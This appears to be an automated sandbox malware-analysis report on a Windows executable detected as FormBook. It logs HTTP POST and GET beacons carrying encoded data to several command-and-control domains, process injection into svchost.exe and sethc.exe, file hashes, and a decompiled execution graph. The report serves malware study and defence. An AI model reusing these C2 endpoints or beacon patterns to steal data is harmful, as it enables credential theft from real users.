User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=n/906ct1wRTcqYGdCRNMSjoyooLghZaE96cu0FLlM/OG1VypzvMrXnW5hNCubfhyEKGqSvLyUSmyC2MwQgWYUzeFu/J1E2XXEcG/lFhgOfWpWnRq8AkFgDIDT5nghWbHoFst4iOyfndPHcyYf6EXs8FsJo1t7R4Pl9qbKtdV62v1CnZAed1jEdZq239ew+WqhfIUqFjiHtw4tOyckxlp2ZdKKN7mVdEDTVTrtYA=
Dec 4, 2024 15:34:21.839943886 CET | 1236 | IN | HTTP/1.1 200 OK
date: Wed, 04 Dec 2024 14:34:21 GMT
content-type: text/html; charset=utf-8
content-length: 1130
x-request-id: f8e2cbb4-a314-4971-be00-501a74e4003d
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qHQTHtx6xrYiTGxeSXicSE8nWIEKKINAfKcQtJ2pC+FcEEllmXW1tsgavK9OhxYIqk+99nB+5EHqy4sBzTYNqw==
set-cookie: parking_session=f8e2cbb4-a314-4971-be00-501a74e4003d; expires=Wed, 04 Dec 2024 14:49:21 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qHQTHtx6xrYiTGxeSXicSE8nWIEKKINAfKcQtJ2pC+FcEEllmXW1tsgavK9OhxYIqk+99nB+5EHqy4sBzTYNqw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 4, 2024 15:34:21.840245008 CET | 583 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjhlMmNiYjQtYTMxNC00OTcxLWJlMDAtNTAxYTc0ZTQwMDNkIiwicGFnZV90aW1lIjoxNzMzMzIyOD


Session ID: 39 | Source IP: 192.168.2.7 | Source Port: 50011 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 7000 | Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:34:23.576796055 CET | 1792 | OUT | POST /pvrm/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.dating-ml-es.xyz
Origin: http://www.dating-ml-es.xyz
Content-Length: 1251
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.dating-ml-es.xyz/pvrm/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH= [TRUNCATED]
Dec 4, 2024 15:34:24.580777884 CET | 1236 | IN | HTTP/1.1 200 OK
date: Wed, 04 Dec 2024 14:34:23 GMT
content-type: text/html; charset=utf-8
content-length: 1130
x-request-id: 59806810-ff9c-4818-89c2-b00514b6683c
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qHQTHtx6xrYiTGxeSXicSE8nWIEKKINAfKcQtJ2pC+FcEEllmXW1tsgavK9OhxYIqk+99nB+5EHqy4sBzTYNqw==
set-cookie: parking_session=59806810-ff9c-4818-89c2-b00514b6683c; expires=Wed, 04 Dec 2024 14:49:24 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qHQTHtx6xrYiTGxeSXicSE8nWIEKKINAfKcQtJ2pC+FcEEllmXW1tsgavK9OhxYIqk+99nB+5EHqy4sBzTYNqw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 4, 2024 15:34:24.580985069 CET | 583 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTk4MDY4MTAtZmY5Yy00ODE4LTg5YzItYjAwNTE0YjY2ODNjIiwicGFnZV90aW1lIjoxNzMzMzIyOD


Session ID: 40 | Source IP: 192.168.2.7 | Source Port: 50012 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 7000 | Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:34:26.356112003 CET | 494 | OUT | GET /pvrm/?GhEtuH=q9VU5shSkDSssKORJVQgPyBT6NXL0uGF1tcH5gjeNKzzvUK22qQBZnHtscqLZ9MjFbahEO+8XCavPFU5GWG6ZiikqcFlEViNL/eErSple439PFpGhjhhgUgyeLHF+kDRjmkJ2QCUDUlW&9hy=gvrDS8U8OP HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.dating-ml-es.xyz
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 4, 2024 15:34:27.407686949 CET | 1236 | IN | HTTP/1.1 200 OK
date: Wed, 04 Dec 2024 14:34:26 GMT
content-type: text/html; charset=utf-8
content-length: 1518
x-request-id: 34a6bf29-539a-425d-8de0-f3f082cdda77
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HVDYtGfc4OTPYr3WuZBkAZ6nhEKoONsJKazVjnxitAJBGgImAynIzh+ynT71SdVqBg3bBkmr3z3WgccqXV/Iqg==
set-cookie: parking_session=34a6bf29-539a-425d-8de0-f3f082cdda77; expires=Wed, 04 Dec 2024 14:49:27 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HVDYtGfc4OTPYr3WuZBkAZ6nhEKoONsJKazVjnxitAJBGgImAynIzh+ynT71SdVqBg3bBkmr3z3WgccqXV/Iqg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 4, 2024 15:34:27.407888889 CET | 971 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzRhNmJmMjktNTM5YS00MjVkLThkZTAtZjNmMDgyY2RkYTc3IiwicGFnZV90aW1lIjoxNzMzMzIyOD


Session ID: 41 | Source IP: 192.168.2.7 | Source Port: 50013 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 7000 | Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:34:33.678714991 CET | 750 | OUT | POST /912o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.soainsaat.xyz
Origin: http://www.soainsaat.xyz
Content-Length: 219
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.soainsaat.xyz/912o/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=220C6di6rKcLtyS9Bjo980lujVWuXXrC8P+/unfm9EhdvXkKVFHdfiqQgWBc8VO4l0xP5PHm9u5RDS7KcJZo22szeswn4+9vaqbulA/Gt73XNT7KYLmS5n2PC+616gkFvbF2O7rrMUSXR9FfUz/lPyEemS8kwfRTN9rntNTHK+JP+pA2BC4TIIf3sUWPmUlIFOg3wTEGVKBsWP7W/g==


Session ID: 42 | Source IP: 192.168.2.7 | Source Port: 50014 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 7000 | Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:34:36.356486082 CET | 770 | OUT | POST /912o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.soainsaat.xyz
Origin: http://www.soainsaat.xyz
Content-Length: 239
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.soainsaat.xyz/912o/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=220C6di6rKcLsTi9HEU96Ulpv1WuNnrG8PC/ujP2hmFdvzoKWEHdciqQr2AYx1P0l09x5NTm9qZRDW/KcaBp3msxWMwp2e9vaqbulAD8t/TXNiLKZpeVnX2OF+61sQkJvbFYO5PRMWqXR5JfR3TiByEciS9TwOsPVoT6ydjhF8R1/fBUbg0/WZnMoWy5xy49HPkv9xwnK9kGbdaSpdMti0FxyJUvwxu4d16k70c=


Session ID: 43 | Source IP: 192.168.2.7 | Source Port: 50015 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 7000 | Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:34:39.306025982 CET | 1783 | OUT | POST /912o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.soainsaat.xyz
Origin: http://www.soainsaat.xyz
Content-Length: 1251
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.soainsaat.xyz/912o/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH= [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.75001685.159.66.93807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:34:42.000524998 CET491OUTGET /912o/?GhEtuH=70ci5pGKsfR7ryWTKFtFiUt7/TqIPHf64KC8vmTT6Dtcu2BtDGHTaTjOoGUC2iu8k3BJ4N7Du7dNBD6fJpU48FM3duIc/ctQLZHS0QyH+uuzGzjKGZHdmjrbFNuBsSBruIhtULDLHkLM&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.soainsaat.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Timestamp:Dec 4, 2024 15:34:43.331453085 CET
                                                                                Bytes transferred:225
                                                                                Direction:IN
                                                                                Data:HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.14.1
                                                                                Date: Wed, 04 Dec 2024 14:34:43 GMT
                                                                                Content-Length: 0
                                                                                Connection: close
                                                                                X-Rate-Limit-Limit: 5s
                                                                                X-Rate-Limit-Remaining: 19
                                                                                X-Rate-Limit-Reset: 2024-12-04T14:34:48.1158597Z


                                                                                Session ID:45
                                                                                Source IP:192.168.2.7
                                                                                Source Port:50019
                                                                                Destination IP:38.63.190.200
                                                                                Destination Port:80
                                                                                PID:7000
                                                                                Process:C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Timestamp:Dec 4, 2024 15:34:49.032622099 CET
                                                                                Bytes transferred:765
                                                                                Direction:OUT
                                                                                Data:POST /4vk9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.nicolemichelle.net
                                                                                Origin: http://www.nicolemichelle.net
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.nicolemichelle.net/4vk9/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 2f 4a 61 30 72 71 36 51 71 34 32 7a 43 4c 61 64 64 52 6f 73 52 76 6e 38 4a 70 53 63 52 79 69 53 32 53 34 6f 58 75 72 7a 42 74 59 50 73 31 46 56 2f 2b 41 6e 63 74 2f 77 53 32 2f 55 36 76 6e 67 30 33 53 47 31 78 6e 63 59 69 58 67 6a 68 53 62 59 44 52 47 4f 4b 77 43 52 63 42 65 5a 70 43 6d 36 77 2f 42 2b 6b 6e 42 75 72 39 56 69 58 6e 58 6e 78 61 34 6b 63 33 34 64 6f 2b 2b 39 64 67 42 62 4e 37 46 35 4f 61 31 42 6e 39 67 78 55 2b 44 4d 58 2f 43 2f 57 5a 36 7a 53 72 6c 32 7a 52 79 61 2f 6d 65 31 6f 4e 73 49 65 65 62 65 73 36 55 64 37 76 6a 63 38 2b 57 4c 2b 4f 58 49 4a 78 44 71 41 35 52 41 4b 32 32 74 34 68 5a 71 7a 70 54 79 41 3d 3d
                                                                                Data Ascii: GhEtuH=/Ja0rq6Qq42zCLaddRosRvn8JpScRyiS2S4oXurzBtYPs1FV/+Anct/wS2/U6vng03SG1xncYiXgjhSbYDRGOKwCRcBeZpCm6w/B+knBur9ViXnXnxa4kc34do++9dgBbN7F5Oa1Bn9gxU+DMX/C/WZ6zSrl2zRya/me1oNsIeebes6Ud7vjc8+WL+OXIJxDqA5RAK22t4hZqzpTyA==


                                                                                Target ID:0
                                                                                Start time:09:30:41
                                                                                Start date:04/12/2024
                                                                                Path:C:\Users\user\Desktop\ek8LkB2Cgo.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ek8LkB2Cgo.exe"
                                                                                Imagebase:0x4f0000
                                                                                File size:1'229'824 bytes
                                                                                MD5 hash:0E566D86BC0EB9416765E07F7BA17392
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:09:30:43
                                                                                Start date:04/12/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ek8LkB2Cgo.exe"
                                                                                Imagebase:0x820000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1542601983.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1543326979.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:09:30:59
                                                                                Start date:04/12/2024
                                                                                Path:C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe"
                                                                                Imagebase:0xaa0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3778462020.00000000030B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:6
                                                                                Start time:10:40:42
                                                                                Start date:04/12/2024
                                                                                Path:C:\Windows\SysWOW64\sethc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\sethc.exe"
                                                                                Imagebase:0xeb0000
                                                                                File size:81'920 bytes
                                                                                MD5 hash:AA9A6E4DADA121001CFDF184B9758BBE
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:7
                                                                                Start time:10:40:57
                                                                                Start date:04/12/2024
                                                                                Path:C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe"
                                                                                Imagebase:0xaa0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:9
                                                                                Start time:10:41:09
                                                                                Start date:04/12/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff722870000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true


                                                                                  Execution Graph

                                                                                  Execution Coverage:3.8%
                                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                                  Signature Coverage:8.7%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:80
                                                                                  execution_graph 92782 569c06 92793 50d3be 92782->92793 92784 569c1c 92792 569c91 Mailbox 92784->92792 92875 4f1caa 49 API calls 92784->92875 92787 569cc5 92789 56a7ab Mailbox 92787->92789 92877 53cc5c 86 API calls 4 library calls 92787->92877 92790 569c71 92790->92787 92876 53b171 48 API calls 92790->92876 92802 503200 92792->92802 92794 50d3ca 92793->92794 92795 50d3dc 92793->92795 92878 4fdcae 50 API calls Mailbox 92794->92878 92797 50d3e2 92795->92797 92798 50d40b 92795->92798 92879 50f4ea 92797->92879 92888 4fdcae 50 API calls Mailbox 92798->92888 92801 50d3d4 92801->92784 92911 4fbd30 92802->92911 92804 503267 92805 5032f8 92804->92805 92806 56907a 92804->92806 92865 503628 92804->92865 92984 50c36b 86 API calls 92805->92984 93019 53cc5c 86 API calls 4 library calls 92806->93019 92810 569072 92810->92787 92812 503313 92863 5034eb _memcpy_s Mailbox 92812->92863 92812->92865 92869 5694df 92812->92869 92916 4f2b7a 92812->92916 92813 5691fa 93034 53cc5c 86 API calls 4 library calls 92813->93034 92814 50c3c3 48 API calls 92814->92863 92818 56926d 93038 53cc5c 86 API calls 4 library calls 92818->93038 92819 5693c5 92822 4ffe30 335 API calls 92819->92822 92820 56909a 92820->92813 93020 4fd645 92820->93020 92824 569407 92822->92824 92824->92865 93043 4fd6e9 92824->93043 92826 569114 92838 569128 92826->92838 92849 569152 92826->92849 92827 569220 93035 4f1caa 49 API calls 92827->93035 92829 5033ce 92832 503465 92829->92832 92833 56945e 92829->92833 92829->92863 92840 50f4ea 48 API calls 92832->92840 93048 53c942 50 API calls 92833->93048 93030 53cc5c 86 API calls 4 library calls 92838->93030 92854 50346c 92840->92854 92841 569438 93047 53cc5c 86 API calls 4 library calls 92841->93047 92842 56923d 92843 569252 92842->92843 92844 56925e 92842->92844 93036 53cc5c 86 API calls 4 library calls 92843->93036 93037 53cc5c 86 API calls 4 library calls 92844->93037 92851 569177 92849->92851 92855 
569195 92849->92855 92850 50f4ea 48 API calls 92850->92863 93031 54f320 335 API calls 92851->93031 92859 50351f 92854->92859 92923 4fe8d0 92854->92923 92856 56918b 92855->92856 93032 54f5ee 335 API calls 92855->93032 92856->92865 93033 50c2d6 48 API calls _memcpy_s 92856->93033 92862 503540 92859->92862 93049 4f6eed 92859->93049 92862->92865 92868 5694b0 92862->92868 92871 503585 92862->92871 92863->92814 92863->92818 92863->92819 92863->92820 92863->92841 92863->92850 92863->92859 92864 569394 92863->92864 92863->92865 92986 4fd9a0 53 API calls __cinit 92863->92986 92987 4fd8c0 53 API calls 92863->92987 92988 50c2d6 48 API calls _memcpy_s 92863->92988 92989 4ffe30 92863->92989 93039 54cda2 82 API calls Mailbox 92863->93039 93040 5380e3 53 API calls 92863->93040 93041 4fd764 55 API calls 92863->93041 93042 4fdcae 50 API calls Mailbox 92863->93042 92867 50f4ea 48 API calls 92864->92867 92874 503635 Mailbox 92865->92874 93018 53cc5c 86 API calls 4 library calls 92865->93018 92867->92819 93053 4fdcae 50 API calls Mailbox 92868->93053 92869->92865 93054 53cc5c 86 API calls 4 library calls 92869->93054 92871->92865 92871->92869 92872 503615 92871->92872 92985 4fdcae 50 API calls Mailbox 92872->92985 92874->92787 92875->92790 92876->92792 92877->92789 92878->92801 92881 50f4f2 __calloc_impl 92879->92881 92882 50f50c 92881->92882 92883 50f50e std::exception::exception 92881->92883 92889 51395c 92881->92889 92882->92801 92903 516805 RaiseException 92883->92903 92885 50f538 92904 51673b 47 API calls _free 92885->92904 92887 50f54a 92887->92801 92888->92801 92890 5139d7 __calloc_impl 92889->92890 92892 513968 __calloc_impl 92889->92892 92910 517c0e 47 API calls __getptd_noexit 92890->92910 92891 513973 92891->92892 92905 5181c2 47 API calls __NMSG_WRITE 92891->92905 92906 51821f 47 API calls 5 library calls 92891->92906 92907 511145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92891->92907 92892->92891 92895 51399b RtlAllocateHeap 92892->92895 92898 
5139c3 92892->92898 92901 5139c1 92892->92901 92895->92892 92896 5139cf 92895->92896 92896->92881 92908 517c0e 47 API calls __getptd_noexit 92898->92908 92909 517c0e 47 API calls __getptd_noexit 92901->92909 92903->92885 92904->92887 92905->92891 92906->92891 92908->92901 92909->92896 92910->92896 92912 4fbd3f 92911->92912 92915 4fbd5a 92911->92915 93055 4fbdfa 92912->93055 92914 4fbd47 CharUpperBuffW 92914->92915 92915->92804 92917 4f2b8b 92916->92917 92918 56436a 92916->92918 92919 50f4ea 48 API calls 92917->92919 92920 4f2b92 92919->92920 92921 4f2bb3 92920->92921 93072 4f2bce 48 API calls 92920->93072 92921->92829 92924 4fe8f6 92923->92924 92959 4fe906 Mailbox 92923->92959 92926 4fed52 92924->92926 92924->92959 92925 53cc5c 86 API calls 92925->92959 93167 50e3cd 335 API calls 92926->93167 92928 4febc7 92929 4febdd 92928->92929 93168 4f2ff6 16 API calls 92928->93168 92929->92863 92931 4fed63 92931->92929 92933 4fed70 92931->92933 92932 4fe94c PeekMessageW 92932->92959 93169 50e312 335 API calls Mailbox 92933->93169 92935 56526e Sleep 92935->92959 92936 4fed77 LockWindowUpdate DestroyWindow GetMessageW 92936->92929 92938 4feda9 92936->92938 92940 5659ef TranslateMessage DispatchMessageW GetMessageW 92938->92940 92940->92940 92941 